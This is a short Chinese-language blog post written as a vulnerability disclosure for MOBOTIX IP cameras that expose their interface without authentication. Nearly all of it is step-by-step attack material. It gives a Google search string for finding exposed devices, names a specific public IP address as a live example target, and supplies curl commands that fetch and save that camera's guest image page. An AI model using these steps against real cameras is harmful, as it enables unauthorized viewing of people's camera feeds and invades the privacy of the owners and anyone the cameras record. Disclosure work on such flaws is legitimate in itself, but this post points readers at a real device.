MOBOTIX IP 摄像头未授权访问漏洞详情

本文详细披露了MOBOTIX品牌IP摄像头存在的一个未授权访问安全漏洞。攻击者可通过特定Google搜索语句直接发现暴露在公网的设备,并无需任何认证即可访问摄像头管理界面,获取实时画面。

MOBOTIX IP cameras Unauthenticated access

发布日期: 2025.06.20 提交者: hasanwlip

风险等级: 中等 本地利用: 否 远程利用: 是 CVE编号: N/A CWE编号: CWE-306 (关键功能缺失认证) 搜索语句: intext:"© 2001-2025 MOBOTIX" -site:*.* -inurl:www

漏洞复现步骤

步骤 1:通过Google搜索语句进行查找 结果示例: http://195.70.120.133/

步骤 2:在浏览器中访问该IP地址 摄像头管理界面直接加载,无需任何身份验证。

步骤 3:使用cURL捕获摄像头界面内容

1

curl http://195.70.120.133/cgi-bin/guestimage.html

可选步骤:将原始HTML内容保存到文件

1

curl http://195.70.120.133/cgi-bin/guestimage.html --output snap.html

参考链接

  1. https://www.google.com/search?q=intext:%22%C2%A9+2001-2025+MOBOTIX%22+-site:.+-inurl:www
  2. https://www.mobotix.com/en (厂商官方网站)
  3. 漏洞由 hasanwlip 发现并报告
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次